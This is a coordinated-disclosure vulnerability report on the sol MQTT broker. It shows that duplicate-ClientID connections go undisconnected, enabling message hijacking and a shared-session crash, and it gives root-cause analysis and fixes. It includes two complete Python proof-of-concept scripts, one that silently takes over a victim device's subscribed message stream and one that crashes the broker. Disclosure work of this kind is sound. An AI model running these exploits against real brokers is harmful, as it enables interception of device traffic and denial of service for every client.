Executive Summary
The sol MQTT broker (self-identified as MQTT 3.1.1, sol.c:62) fails to disconnect an existing client when a second connection reuses the same ClientID, in violation of the binding MQTT 3.1.1 requirement [MQTT-3.1.4-2] ("the Server MUST disconnect the existing Client"). Because sol relies on uthash without deduplication and routes publishes by first-match bucket lookup, an attacker who knows or guesses a victim's ClientID can (a) silently receive all of the victim's subsequently-published subscribed-topic messages while the victim's connection stays open and receives nothing, and (b) trigger a remote null-dereference / use-after-free crash that takes down the entire single-process broker for every connected client. Both consequences reproduce dynamically from the network with two client connections plus a publisher; under the default allow_anonymous=true configuration no credentials are required.
poc.zip
Metadata
| Field | Value |
| --- | --- |
| Affected product | sol MQTT broker, version 0.18.5 (and, in all likelihood, every release that carries this connect_handler / shared-session design) |
| Component | Connection & session management: connect_handler (src/handlers.c), publish_message, ack handlers, inflight-retry cron (src/server.c), struct client_session (src/sol_internal.h) |
| Authentication | Pre-auth under the compiled default allow_anonymous=true (config.c:368). With authentication enabled, any single valid low-privilege account suffices to intercept/crash other clients. |
| Embargo / coordinated disclosure | Target disclosure window: 90 days from first contact; exact public-disclosure date to be agreed with the maintainer |
| Status | Coordinated / responsible disclosure; not yet public |
Affected versions & configuration
- Version: sol 0.18.5 (set in CMakeLists.txt:4), C, source root src/.
- Protocol: MQTT 3.1.1. sol.c:62 prints Sol v%s MQTT broker 3.1.1; README.md:8 advertises "almost all MQTT v3.1.1 commands". The CONNECT unpacker never inspects the protocol-level byte (mqtt.c:223-227 skips straight past it), and no v5.0 property/reason-code path exists anywhere in src/. The binding bar for this implementation is therefore the MQTT 3.1.1 spec, with v5.0 cited only as context.
- Configuration: allow_anonymous = true is the compiled-in default (config.c:368 in config_set_default()); it is flipped to false only by an explicit config line equal to the string "false" (config.c:246-251). Under the default the issue is pre-auth.
- The crash race requires a non-zero worker-thread pool: THREADSNR = 2 is the default (server.h:39), so the race is present in default builds. With THREADSNR == 0 the hijack still occurs but the concurrent-ref_dec crash is not reachable (single-threaded serialisation).
- Most likely all prior versions with this connect_handler / shared-session design are affected; we have only independently verified 0.18.5.
Technical overview
A single missing control — disconnecting the existing live connection on a duplicate-ClientID CONNECT — yields two distinct, both-network-observable consequences:
- Silent subscription/message-stream interception. When a second CONNECT arrives with a ClientID already present in server.clients_map, sol leaves the original connection alive and prepends the new client into the same uthash bucket. publish_message resolves subscribers via first-match bucket lookup, so the most-recently-added connection (the attacker) deterministically receives subsequent PUBLISHes for that ClientID/session, while the still-connected victim silently receives nothing. The victim gets no DISCONNECT, so the interception is invisible.
- Remote crash DoS. With clean_session=false, the second CONNECT also reuses the victim's struct client_session by pointer with no session-level lock. The inflight-retry cron (inflight_msg_check, registered every 1 s, re-sending anything held > 20 s) iterates all clients including both colliding entries and operates concurrently on the shared session's i_msgs[] / refcounts across the two worker threads. A PUBACK clearing an inflight slot on one connection can race against a duplicate/cron-driven clear on the other, producing a ref_dec on a NULL packet pointer and a SEGV that aborts the whole broker.
Root cause analysis
1. The "kick out" comment is dead code; no existing connection is ever closed.
connect_handler carries an aspirational comment but performs no eviction:
/* handlers.c:390-393 */
/*
* Add the new connected client to the global map, if it is already
* connected, kick him out accordingly to the MQTT v3.1.1 specs.
*/
The code below it looks up only the session table and never the live-connection table:
/* handlers.c:400-405 */
HASH_FIND_STR(server.sessions, cc->client_id, cc->session);
if (cc->session && c->bits.clean_session == true)
    HASH_DEL(server.sessions, cc->session); /* removes only the SESSION entry */
else if (cc->session)
    session_present = 1; /* session-reuse branch */
server.sessions is the session store; the live connections live in server.clients_map. There is no HASH_FIND_STR on server.clients_map anywhere in connect_handler — the only such lookup in the file is in publish_message (handlers.c:167). There is no client_deactivate() call and no DISCONNECT send on the colliding path. The client_deactivate() call sites are exclusively on a client's own read-error/disconnect teardown (server.c:709/833/884), and the only HASH_DEL(server.clients_map, ...) lives inside client_deactivate (server.c:441), never on connect. So the pre-existing connection stays authenticated and online (its online flag, set at client_init/accept in server.c:383, is cleared only in its own client_deactivate at server.c:425).
The session-HASH_DEL at line 403 and the session_present=1 at line 405 touch only the session table, never the live socket.
2. Duplicate ClientID keys coexist in clients_map.
/* handlers.c:425 */
HASH_ADD_STR(server.clients_map, client_id, cc); /* unconditional */
This call is guarded only by the global mutex (taken at handlers.c:397), not by any duplicate-key check. sol's bundled uthash does not deduplicate: HASH_ADD_TO_BKT (src/uthash.h:869-884) merely prepends addhh to the bucket's hh_head list with no key-equality check, and HASH_ADD_TO_TABLE (uthash.h:376-385) likewise enforces no uniqueness. Two struct client entries with identical client_id therefore coexist.
3. The colliding CONNECT reuses the victim's session by pointer.
On the clean_session=false collision path, the session-reuse branch is taken and allocation is skipped:
/* handlers.c:416 */
if (c->bits.clean_session == true || !cc->session) {
    cc->session = client_session_alloc(cc->client_id); /* NOT taken on reuse */
    ...
}
Since cc->session was already populated by the HASH_FIND_STR at line 400, the new client's cc->session ends up pointing to the same struct client_session the already-connected victim is using. Three references to one struct now coexist: the server.sessions uthash entry, the victim's c->session, and the attacker's cc->session. No deep copy occurs. session_present=1 (handlers.c:405) is later passed to set_connack (handlers.c:471) as the CONNACK Session-Present flag (set_connack writes 0 | (sp & 0x1) << 0, handlers.c:311) — observed as SP=1 in the PoC.
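The aliasing described above can be modelled in a few lines of Python. This is a minimal sketch and not sol's code: `ClientSession`, `Client`, `connect`, and the `sessions` dict are hypothetical stand-ins for struct client_session, struct client, connect_handler, and server.sessions. Only the lookup and reuse branches quoted above are mirrored, and registering a freshly allocated session in the table is an assumption about the elided body.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple


@dataclass
class ClientSession:
    """Hypothetical stand-in for struct client_session."""
    session_id: str
    i_msgs: dict = field(default_factory=dict)  # packet id -> inflight packet


@dataclass
class Client:
    """Hypothetical stand-in for struct client."""
    client_id: str
    session: Optional[ClientSession] = None


def connect(sessions: Dict[str, ClientSession], client_id: str,
            clean_session: bool) -> Tuple[Client, int]:
    """Mirror the quoted lookup/reuse branches; return (client, session_present)."""
    cc = Client(client_id)
    session_present = 0
    cc.session = sessions.get(client_id)        # like HASH_FIND_STR on server.sessions
    if cc.session is not None and clean_session:
        del sessions[client_id]                 # touches the session table only
    elif cc.session is not None:
        session_present = 1                     # session-reuse branch
    if clean_session or cc.session is None:
        cc.session = ClientSession(client_id)   # fresh allocation, skipped on reuse
        sessions[client_id] = cc.session        # assumption: elided body registers it
    return cc, session_present


sessions: Dict[str, ClientSession] = {}
victim, sp_a = connect(sessions, "victim-device-001", clean_session=False)
attacker, sp_b = connect(sessions, "victim-device-001", clean_session=False)

# The second CONNECT reports Session-Present and aliases the victim's session object.
print(sp_a, sp_b, victim.session is attacker.session)
```

In this model the second call never allocates, so any mutation made through `attacker.session` is visible through `victim.session`, which is the property the crash path depends on.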
4. Routing uses first-match bucket lookup → newest connection wins.
/* handlers.c:167 */
HASH_FIND_STR(server.clients_map, s->session_id, sc);
HASH_FIND_STR → HASH_FIND → HASH_FIND_BYHASHVALUE → HASH_FIND_IN_BKT (src/uthash.h:846-866) walks the bucket chain from hh_head and breaks on the first key match (uthash.h:853-857). Because HASH_ADD_TO_BKT prepends (uthash.h:873-878), hh_head is the most-recently-added entry. Both connections hash to the same bucket (identical key string), so the lookup returns the attacker (B, added second). This is why subsequent PUBLISHes for that ClientID are delivered to the attacker and not to the victim.
(Clarifying "head": here "head" means the bucket's hh_head, set by prepend = most-recently-added — not the global uthash list head, which HASH_APPEND_LIST appends to. The publish-routing path uses the bucket chain, so "most-recently-added" is the right description.)
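The prepend-then-first-match behaviour can be reproduced with a toy bucket. The sketch below is not uthash; `Bucket`, `add`, and `find` are hypothetical names that only imitate the two properties cited above (prepend with no key-equality check, lookup that stops at the first match).

```python
from typing import List, Optional, Tuple


class Bucket:
    """Toy model of a single hash bucket chain (hypothetical, not uthash)."""

    def __init__(self) -> None:
        # (key, connection label) pairs, head of the chain first.
        self.chain: List[Tuple[str, str]] = []

    def add(self, key: str, conn: str) -> None:
        # Prepend without checking whether the key already exists.
        self.chain.insert(0, (key, conn))

    def find(self, key: str) -> Optional[str]:
        # Walk from the head and return on the first key match.
        for k, conn in self.chain:
            if k == key:
                return conn
        return None


bucket = Bucket()
bucket.add("victim-device-001", "A")   # victim connects first
bucket.add("victim-device-001", "B")   # attacker collides second

print(len(bucket.chain), bucket.find("victim-device-001"))
```

Both entries remain in the chain, but every lookup resolves to the entry added last, matching the "newest connection wins" routing described above.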
5. No session-level lock; the shared session is mutated concurrently.
struct client_session (sol_internal.h:225-244) has no pthread_mutex_t member — only UT_hash_handle hh and struct ref refcount. The per-client lock lives on struct client (sol_internal.h:208), not the session. The ack handlers that DECREF inflight packets lock only the calling client's mutex:
/* handlers.c:791, 793-794 */
pthread_mutex_lock(&c->mutex);
...
inflight_msg_clear(&c->session->i_msgs[pkt_id]); /* DECREF(packet) then ... */
c->session->i_msgs[pkt_id].packet = NULL; /* ... clears the slot */
pubcomp_handler (handlers.c:839-855, DECREF at line 848) follows the same single-c->mutex pattern. Because c1->session == c2->session but c1->mutex != c2->mutex, two threads can mutate the same i_msgs[] / i_acks[] / inflights / next_free_mid with no lock in common.
Precision on locking asymmetry (important): the publish side of these mutations is guarded — publish_message takes the global mutex (handlers.c:152), which covers next_free_mid() (line 189) and the inflight writes (lines 202-204 offline / 216-218 online). The ack side (puback/pubcomp) takes only c->mutex, not the global mutex. (Note: pubrec_handler at handlers.c:803-820 does take c->mutex at line 809, but its only shared-session write — c->session->i_acks[pkt_id] = time(NULL) at line 817 — sits outside that lock; it does not mutate i_msgs[] and does not DECREF, so it is the weakest example of the pattern.) The hazard is the missing lock shared between c1->mutex and c2->mutex, combined with the ack side bypassing the global lock that protects the publish side. That asymmetry, plus the absence of any session-level lock, is the real root cause.
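The absence of a common lock can be shown without racing any threads. The following is a minimal sketch under stated assumptions: `Session` and `Client` are hypothetical models, and the `lock` field on `Session` does not exist in struct client_session today; it is included only to contrast per-client locking with a session-level lock.

```python
import threading
from dataclasses import dataclass, field


@dataclass
class Session:
    i_msgs: dict = field(default_factory=dict)
    # Hypothetical session-level lock; the real struct has no such member.
    lock: threading.Lock = field(default_factory=threading.Lock)


@dataclass
class Client:
    session: Session
    mutex: threading.Lock = field(default_factory=threading.Lock)


shared = Session()
c1, c2 = Client(shared), Client(shared)   # two connections, one session

# Per-client mutexes: while c1 holds its own lock, c2 can still take its own.
with c1.mutex:
    c2_entered = c2.mutex.acquire(blocking=False)
    if c2_entered:
        c2.mutex.release()

# Session-level lock: the second holder is refused while the first is inside.
with c1.session.lock:
    c2_entered_session = c2.session.lock.acquire(blocking=False)
    if c2_entered_session:
        c2.session.lock.release()

print(c2_entered, c2_entered_session)
```

The first result being true is the model's version of "c1->mutex != c2->mutex": each handler believes it is in a critical section, yet nothing excludes the other from the shared i_msgs[].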
6. The inflight-retry cron is the path that hits both colliding connections.
/* server.c:327-330 */
// TODO remove 20 hardcoded value
...
if (c->session->i_msgs[i].packet &&
    (now - c->session->i_msgs[i].seen) > 20) {
The cron is registered to fire every 1 second:
/* server.c:937 */
ev_register_cron(&ctx, inflight_msg_check, NULL, 1, 0);
Critically, inflight_msg_check iterates clients with HASH_ITER (server.c:319), which visits every entry — including both colliding entries with the duplicate ClientID. The publish-routing path, by contrast, uses HASH_FIND_STR (first-match only) and thus funnels traffic to a single connection. This routing-vs-cron iteration difference is precisely why the 20 s-retry cron path — and only it — concurrently replays the shared i_msgs[], creating the double-ref_dec / NULL-packet window that crashes the broker. This also explains why naive high-throughput stress (routing-funnelled) does not crash, while the deliberate unacked-inflight + takeover sequence does.
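The difference between full iteration and first-match lookup can be sketched as follows. This is an illustrative model only: `Session` is reduced to a dict of packet id to last-sent time, and `cron_visits` is a hypothetical function that imitates the retry pass visiting every map entry, duplicates included.

```python
from typing import Dict, List, Tuple

# Hypothetical model: a session is just {packet id: time last sent}.
Session = Dict[int, float]


def cron_visits(clients: List[Tuple[str, Session]], now: float,
                threshold: float = 20.0) -> List[Tuple[str, int]]:
    """List the (connection, packet id) pairs one retry pass would touch."""
    visits = []
    for conn, session in clients:            # every entry, like HASH_ITER
        for pkt_id, seen in session.items():
            if now - seen > threshold:       # strictly older than the threshold
                visits.append((conn, pkt_id))
    return visits


shared: Session = {1: 0.0, 2: 0.0}           # two unacked QoS 1 messages sent at t=0
clients = [("B", shared), ("A", shared)]     # duplicate ClientID, one shared session

visits = cron_visits(clients, now=22.0)
print(visits)
```

Each packet id shows up once per colliding connection, so a single retry pass handles every shared inflight slot twice, whereas the routing lookup would only ever reach one of the two connections.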
Specification context
sol is an MQTT 3.1.1 broker. The binding obligation it violates is the OASIS MQTT 3.1.1 requirement numbered [MQTT-3.1.4-2]. That ID belongs to the 3.1.1 numbering scheme; the collision rule carries a different ID in v5.0 (see the numbering correction below):
MQTT 3.1.1 §3.1.4 [MQTT-3.1.4-2]: "If the ClientID represents a Client already connected to the Server then the Server MUST disconnect the existing Client [MQTT-3.1.4-2]."
sol does not comply: on a duplicate ClientID it neither sends a DISCONNECT to nor closes the pre-existing live connection.
For informational context, MQTT v5.0 strengthens the same obligation (and assigns it a different normative ID, [MQTT-3.1.4-3], not [MQTT-3.1.4-2]). From the v5.0 spec text:
§3.1.4 "CONNECT Actions", lines 4760-4765: "If the ClientID represents a Client already connected to the Server, the Server sends a DISCONNECT packet to the existing Client with Reason Code of 0x8E (Session taken over) as described in section 4.13 and MUST close the Network Connection of the existing Client [MQTT-3.1.4-3]."
Normative-statement table (lines 12316-12324) restates [MQTT-3.1.4-3] verbatim.
Reason-code definition (line 9211): "142 0x8E Session taken over Server Another Connection using the same ClientID has connected causing this Connection to be closed."
Numbering correction (please cite carefully): the two specs use different IDs for the collision rule. In MQTT 3.1.1 it is [MQTT-3.1.4-2]; in MQTT v5.0 the collision/takeover rule is [MQTT-3.1.4-3] — v5.0's [MQTT-3.1.4-2] is a different statement about authentication/authorization checks (MQTT-v5.0.txt:4749 / 12308-12314). Because sol is a 3.1.1 broker, the binding requirement it fails is the 3.1.1 [MQTT-3.1.4-2] "MUST disconnect the existing Client". The v5.0 [MQTT-3.1.4-3] 0x8E-DISCONNECT requirement is informational context showing how the obligation is strengthened in the newer spec; it is not a normative bar that a 3.1.1-only implementation is held to (sol already fails the lower 3.1.1 bar by leaving the old connection live).
Impact
- Confidentiality (High). The victim's entire subsequent subscribed-topic message stream is silently diverted to the attacker. The PoC shows that after the attacker's collision CONNECT, the victim receives nothing (CLAIM3: A msgs=[]) while the attacker receives every PUBLISH (CLAIM2: B msgs=[b'hijacked-2']). For IoT deployments where ClientIDs are frequently fixed/guessable device identifiers, this is a full-stream disclosure.
- Integrity (High). The attacker becomes a silent MITM on the victim's stream, able to swallow, forge, or replay commands destined for IoT devices. Separately, the shared-session race corrupts the victim's next_free_mid / i_msgs[] / i_acks[] / inflights state, so even non-intercepted traffic is at risk of misdelivery or silent loss.
- Availability (High). The concurrent double-clear of a shared inflight slot drives ref_dec on a NULL packet pointer (SEGV on unknown address 0x80 (WRITE, zero page) in ref_dec at ref.h:52, reached via puback_handler at handlers.c:793). This is a structural null/UAF dereference that will SIGSEGV a release build as well; it is not an ASan-only artifact, and ASan merely makes reproduction reliable. Because sol is a single process with no SIGSEGV handler, the crash takes the broker down for every connected client.
- Stealth. Because sol never sends a DISCONNECT (let alone a v5.0 0x8E "Session taken over") to the displaced client, the victim's connection shows no sign of having been taken over: its keepalive PINGREQ/PINGRESP still round-trips (PoC CLAIM1). Detection by the victim requires correlating a silent drop in message delivery with a takeover event, which is impractical in normal telemetry.
- Exploitability framing. The hijack is low-complexity and reliable at normal connection counts. The crash is timing-gated but the window is fully attacker-controlled (the attacker chooses PUBACK cadence and the takeover instant), so it does not rise to AC:H. Note that bare high-throughput stress (~1.1M messages) does not crash because routing funnels traffic to a single connection and starves the concurrent-ack condition. The reliable trigger is the deliberate unacked-inflight + takeover sequence shown in the crash PoC.
Proof of Concept
All PoCs are bare MQTT 3.1.1 over plain TCP; no third-party Python dependencies. They target 127.0.0.1:1884 against sol_bin (hijack) or sol_asan (crash). Files live in-tree at poc/.
Build & run
cd /path/to/sol
# Release build (for the hijack PoC):
cmake -B build-release && cmake --build build-release -- -j
# ASan/UBSan build (for the crash PoC):
cmake -B build-debug -DDEBUG=ON && cmake --build build-debug -- -j
# Run the broker with the minimal plain-TCP config (omits cafile so tls=false),
# binding 127.0.0.1:1884, and record its PID for the crash PoC's watchdog:
./build-debug/sol -c sol_poc.conf & echo $! > /tmp/sol_asan.pid
# Hijack (7/7):
python3 mqtt004_hijack.py
# Crash (~40 s; tail the broker's stderr or check exit code):
python3 mqtt004_cron_race.py
PoC 1 — silent subscription/message hijack (mqtt004_hijack.py)
Minimal reproducer (self-contained; verbatim from the verified file):
#!/usr/bin/env python3
"""MQTT_004 PoC - ClientID-collision subscription/message hijack against sol.
Bucket-A (fully network-observable). Raw MQTT 3.1.1 over plain TCP, no deps."""
import socket, struct, time, sys

HOST, PORT = "127.0.0.1", 1884
VICTIM_ID = "victim-device-001"
TOPIC = "secret/sensor/data"

def rl(n):
    out = bytearray()
    while True:
        b = n % 128; n //= 128
        if n: b |= 128
        out.append(b)
        if not n: break
    return bytes(out)

def s16(s):
    b = s.encode() if isinstance(s, str) else s
    return struct.pack("!H", len(b)) + b

def pkt(typ, flags, payload):
    return bytes([((typ & 0xF) << 4) | (flags & 0xF)]) + rl(len(payload)) + payload

def connect(client_id, clean=True, keepalive=60, username=None, password=None):
    vh = s16("MQTT") + b"\x04"  # level 4 == 3.1.1
    flags = 0x02 if clean else 0x00  # bit1 = clean session
    pl = s16(client_id)
    if username is not None: flags |= 0x80; pl += s16(username)
    if password is not None: flags |= 0x40; pl += s16(password)
    vh += struct.pack("!BH", flags, keepalive)
    return pkt(1, 0, vh + pl)  # CONNECT = 1

def subscribe(pktid, topic, qos=0):
    return pkt(8, 0x02, struct.pack("!H", pktid) + s16(topic) + bytes([qos]))

def publish(topic, msg, qos=0, retain=False):
    flags = (qos << 1) | (0x01 if retain else 0x00)
    payload = s16(topic)
    if qos > 0: payload += struct.pack("!H", 1)
    return pkt(3, flags, payload + (msg.encode() if isinstance(msg, str) else msg))

PINGREQ = bytes([0xC0, 0x00])
DISCONNECT = bytes([0xE0, 0x00])

def recvn(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk: raise ConnectionError("peer closed")
        buf += chunk
    return buf

def recv_pkt(sock, timeout=2.0):
    sock.settimeout(timeout)
    try:
        hdr = recvn(sock, 1)
    except socket.timeout:
        return None
    if not hdr: return None
    t = hdr[0] >> 4; flags = hdr[0] & 0xF
    mult = 1; rem = 0; got = 0
    while True:
        b = recvn(sock, 1)[0]; got += 1
        rem += (b & 0x7F) * mult
        if not (b & 0x80): break
        mult *= 128
        if got > 4: return None
    payload = recvn(sock, rem) if rem else b""
    return (t, flags, payload)

def drain(sock, t=0.4):
    out = []
    while True:
        p = recv_pkt(sock, timeout=t)
        if p is None: break
        out.append(p)
    return out

def parse_publish(payload):
    tlen = struct.unpack("!H", payload[:2])[0]
    topic = payload[2:2 + tlen].decode(errors="replace")
    msg = payload[2 + tlen:]
    return topic, msg

def main():
    results = []

    def check(name, cond, detail=""):
        results.append((name, cond, detail))
        print(f" [{'PASS' if cond else 'FAIL'}] {name}" + (f" - {detail}" if detail else ""))

    # A: victim - clean=False so session is reused on collision
    A = socket.create_connection((HOST, PORT))
    A.sendall(connect(VICTIM_ID, clean=False))
    ack = recv_pkt(A)
    check("A CONNECT accepted", ack and ack[0] == 2 and ack[2][1] == 0,
          f"CONNACK rc={ack[2][1] if ack else 'none'}")
    A.sendall(subscribe(1, TOPIC, 0))
    suback = recv_pkt(A)
    check("A SUBSCRIBE acked", suback and suback[0] == 9,
          f"SUBACK granted={list(suback[2][2:]) if suback else 'none'}")

    # Publisher P
    P = socket.create_connection((HOST, PORT))
    P.sendall(connect("publisher-X", clean=True)); recv_pkt(P)

    # Baseline: A should get a publish before the hijack
    P.sendall(publish(TOPIC, "baseline-1")); time.sleep(0.4)
    base_recv = [p for p in drain(A) if p[0] == 3]
    check("baseline: A receives PUBLISH before hijack",
          any(parse_publish(p[2])[1] == b"baseline-1" for p in base_recv),
          f"{len(base_recv)} publish(es) on A")

    # Attacker B: SAME ClientID, clean=False -> reuses A's session
    B = socket.create_connection((HOST, PORT))
    B.sendall(connect(VICTIM_ID, clean=False))
    back = recv_pkt(B)
    check("B CONNECT accepted (collision)", back and back[0] == 2 and back[2][1] == 0,
          f"CONNACK rc={back[2][1] if back else 'none'}, SP={back[2][0] if back else '?'}")

    # CLAIM1: A still alive after takeover (sol did NOT close it)
    time.sleep(0.5); A.sendall(PINGREQ); pr = recv_pkt(A, timeout=2.0)
    check("CLAIM1: A still alive after takeover (sol did NOT close it)",
          pr is not None and pr[0] == 13,  # 13 == PINGRESP
          "PINGRESP received" if pr and pr[0] == 13 else
          (f"got type={pr[0]}" if pr else "no response (closed?)"))

    # CLAIM2/3: who gets the post-takeover publish?
    P.sendall(publish(TOPIC, "hijacked-2")); time.sleep(0.6)
    a_msgs = [parse_publish(p[2])[1] for p in drain(A, 0.4) if p[0] == 3]
    b_msgs = [parse_publish(p[2])[1] for p in drain(B, 0.4) if p[0] == 3]
    check("CLAIM2: attacker B receives the post-takeover PUBLISH",
          any(m == b"hijacked-2" for m in b_msgs), f"B msgs={b_msgs}")
    check("CLAIM3: victim A does NOT receive the post-takeover PUBLISH",
          not any(m == b"hijacked-2" for m in a_msgs), f"A msgs={a_msgs}")

    print("\n=== SUMMARY ===")
    for n, c, _ in results: print(f" {'OK' if c else 'XX'} {n}")
    hijack = all(c for _, c, _ in results[6:])
    print(f"\nVERDICT: MQTT_004 hijack {'CONFIRMED' if hijack else 'NOT confirmed'} "
          f"({sum(c for _,c,_ in results)}/{len(results)} checks passed)")
    try:
        B.sendall(DISCONNECT); B.close()
        A.sendall(DISCONNECT); A.close()
        P.sendall(DISCONNECT); P.close()
    except OSError:
        pass

if __name__ == "__main__":
    try:
        main()
    except (ConnectionError, OSError) as e:
        print(f"ERROR connecting to sol @ {HOST}:{PORT}: {e}", file=sys.stderr)
        sys.exit(2)
Observed output (two independent clean runs, identical):
 [PASS] A CONNECT accepted - CONNACK rc=0
 [PASS] A SUBSCRIBE acked - SUBACK granted=[0]
 [PASS] baseline: A receives PUBLISH before hijack - 1 publish(es) on A
 [PASS] B CONNECT accepted (collision) - CONNACK rc=0, SP=1 ← SP=1 confirms session-reuse branch
 [PASS] CLAIM1: A still alive after takeover (sol did NOT close it) - PINGRESP received
 [PASS] CLAIM2: attacker B receives the post-takeover PUBLISH - B msgs=[b'hijacked-2']
 [PASS] CLAIM3: victim A does NOT receive the post-takeover PUBLISH - A msgs=[]
VERDICT: MQTT_004 hijack CONFIRMED (7/7)
Note: the broker may also core-dump during the PoC's DISCONNECT teardown (observed aborted (core dumped) at the kill/wait line in two runs). That is a third symptom of the same shared-session/refcount bug (consistent with the cron-race UAF below), triggered by both A and B tearing down the same client_session. The 7 hijack assertions do not depend on the crash; report it as an additional crash vector, not as a flaw in the demonstration.
PoC 2 — remote crash via shared-session refcount race (mqtt004_cron_race.py)
Scenario: A (clean=false) subscribes at QoS1; the publisher P sends 39 QoS1 PUBLISHes that A does not ack (they stay inflight in the shared session's i_msgs); wait 22 s so sol's 20 s inflight-retry cron (server.c:329-330) is armed; then attacker B connects with the same ClientID (session reuse). The cron's HASH_ITER now visits both A and B (duplicate keys) and concurrently operates on the same i_msgs[]/refcounts across the two worker threads (THREADSNR=2). B's PUBACK of a dup retry racing with A's cron retry on the same slot drives ref_dec on a NULL packet pointer → SEGV.
Minimal harness (verbatim from the verified file; it imports codec helpers from mqtt004_race.py):
import socket, struct, time, sys
sys.path.insert(0, '.')
from mqtt004_race import connect, subscribe, publish_qos1, recv_pkt, recvn, rl, s16, pkt

HOST, PORT = "127.0.0.1", 1884
VID = "victim-cron-001"; TOPIC = "secret/cron"

def conn(cid, clean=True):
    s = socket.create_connection((HOST, PORT))
    s.sendall(connect(cid, clean)); recv_pkt(s, 2); return s

A = conn(VID, False); A.sendall(subscribe(1, TOPIC, 1)); recv_pkt(A, 2)
P = conn("pub-cron", True)

# Send QoS1 publishes; A will NOT ack -> they stay inflight in the shared session
for m in range(1, 40):
    P.sendall(publish_qos1(TOPIC, f"hold-{m}", m))
print("sent 39 unacked qos1 -> inflight in shared session; waiting 22s for >20s retry cron...", flush=True)
time.sleep(22)

# Now attacker B reuses the session; cron HASH_ITER will hit BOTH A and B sharing session
B = conn(VID, False)
print("B connected (collision, session reuse). Watching 15s for crash/corruption...", flush=True)
t0 = time.time(); crash = False
while time.time() - t0 < 15:
    if not __import__('os').path.exists(f"/proc/{open('/tmp/sol_asan.pid').read().strip()}"):
        crash = True; break
    # B acks whatever dup retries it gets, racing with A's cron retries on shared i_msgs
    try:
        p = recv_pkt(B, 0.3)
        if p and p[0] == 3 and (p[1] & 0x06):
            pl = p[2]; tl = struct.unpack("!H", pl[:2])[0]
            mid = struct.unpack("!H", pl[2 + tl:4 + tl])[0]
            B.sendall(pkt(4, 0, struct.pack("!H", mid)))  # PUBACK
    except (socket.timeout, ConnectionError, OSError):
        pass
print("CRASHED" if crash else "no crash in window")
for s in (A, B, P):
    try: s.close()
    except: pass
Harness caveat (does not affect the bug's validity): the in-process /proc/PID watchdog can be defeated if the Python client itself first trips struct.error: unpack requires a buffer of 2 bytes on a short/malformed dup retry it receives on B. The broker does still crash — confirmed by reading the broker's stderr log, which contains the full ASan SEGV trace and ==ABORTING==, and by kill -0 showing the process dead. For reliable reporting, harden the harness by wrapping the recv/parse in try/except to ignore short/malformed re-sends, or simply tail the broker's stderr / exit code. The PID file /tmp/sol_asan.pid must be written by the launcher (or the harness needs a fallback), since the watchdog reads it.
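One way to harden the parse step mentioned in the caveat is to validate lengths before unpacking. The helper below is a sketch, not part of the verified PoC files; `publish_packet_id` is a hypothetical name, and it takes the `flags` and `payload` values in the shape that `recv_pkt` returns them.

```python
import struct
from typing import Optional


def publish_packet_id(flags: int, payload: bytes) -> Optional[int]:
    """Return the packet id of a QoS>0 PUBLISH, or None if absent or truncated."""
    if not (flags & 0x06):               # QoS 0 carries no packet id
        return None
    if len(payload) < 2:                 # too short to hold the topic length
        return None
    (topic_len,) = struct.unpack("!H", payload[:2])
    end = 2 + topic_len + 2              # topic length field + topic + packet id
    if len(payload) < end:               # truncated before the packet id
        return None
    (mid,) = struct.unpack("!H", payload[2 + topic_len:end])
    return mid


good = struct.pack("!H", 3) + b"a/b" + struct.pack("!H", 7) + b"hello"
print(publish_packet_id(0x02, good), publish_packet_id(0x02, good[:6]))
```

With a helper of this kind the watchdog loop can skip any re-send for which the result is None instead of raising struct.error, so the /proc check keeps running until the broker exits.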
Suggested remediation
These are suggestions, not demands. The minimal, spec-aligned fix is the first item; the rest harden the shared-session invariant.
1. Disconnect the existing client on ClientID collision (binding 3.1.1 [MQTT-3.1.4-2]). In connect_handler, before HASH_ADD_STR(server.clients_map, client_id, cc) at handlers.c:425, perform a HASH_FIND_STR(server.clients_map, cc->client_id, existing); if found and existing != cc, tear the existing connection down via the existing client_deactivate() path before adding the new client. MQTT 3.1.1 defines DISCONNECT only as a client-to-server packet, so a 3.1.1 broker satisfies the rule by closing the Network Connection; a v5.0 broker would first send DISCONNECT with Reason Code 0x8E "Session taken over", per [MQTT-3.1.4-3]. This makes the long-standing "kick him out" comment at handlers.c:390-393 finally true and removes the duplicate-key ambiguity entirely.
2. Do not let two live connections share one struct client_session without synchronisation. Either (a) disallow session reuse while a connection for that ClientID is still online (fail the second CONNECT or take it over atomically as above), or (b) give struct client_session its own pthread_mutex_t and require it for every mutation of i_msgs[] / i_acks[] / inflights / next_free_mid, including the publish path, the ack handlers (puback/pubrec/pubcomp), and the inflight_msg_check cron. Today the publish side holds only the global mutex while the ack side holds only c->mutex; there is no lock shared between the two colliding clients, which is the precise root cause of the crash.
3. Close the locking asymmetry explicitly. If a session-level lock is added, ensure the inflight-retry cron (server.c:308-352, which HASH_ITERs and so touches both colliding entries) and the ack handlers take it; today the cron's per-client c->mutex lock (server.c:324) does not serialise access to the shared session because the two colliding clients hold different c->mutex instances. Also move pubrec_handler's c->session->i_acks[pkt_id] = time(NULL) (handlers.c:817) inside its c->mutex critical section, or under the new session lock, so it stops being a data race.
4. Consider replacing the unguarded HASH_ADD_STR semantics. Even after the first fix, an explicit "already-present" check before insertion is safer than relying on uthash's duplicate-key tolerance; it makes the routing table's single-winner invariant a code-level guarantee rather than a uthash-implementation detail (and pre-empts any future expansion-induced ordering surprise, where HASH_EXPAND_BUCKETS can reverse intra-bucket order and flip the winner).
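The evict-before-insert idea behind the first and last suggestions can be sketched as below. This is a Python model rather than a patch for sol: `register_client`, `clients_map` as a dict, and the `deactivate` callback are hypothetical stand-ins for the proposed lookup on server.clients_map and for the existing client_deactivate() path.

```python
from typing import Callable, Dict, List


def register_client(clients_map: Dict[str, str], client_id: str, new_conn: str,
                    deactivate: Callable[[str], None]) -> None:
    """Evict any live connection already holding client_id, then insert new_conn."""
    existing = clients_map.get(client_id)     # the lookup that is missing today
    if existing is not None and existing != new_conn:
        deactivate(existing)                  # stand-in for closing the old connection
    clients_map[client_id] = new_conn         # at most one entry per ClientID


closed: List[str] = []
clients_map: Dict[str, str] = {}
register_client(clients_map, "victim-device-001", "conn-A", closed.append)
register_client(clients_map, "victim-device-001", "conn-B", closed.append)

print(clients_map, closed)
```

After the second registration only one entry remains and the earlier connection has been handed to the teardown callback, so lookup and iteration can no longer disagree about who owns the ClientID.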
References
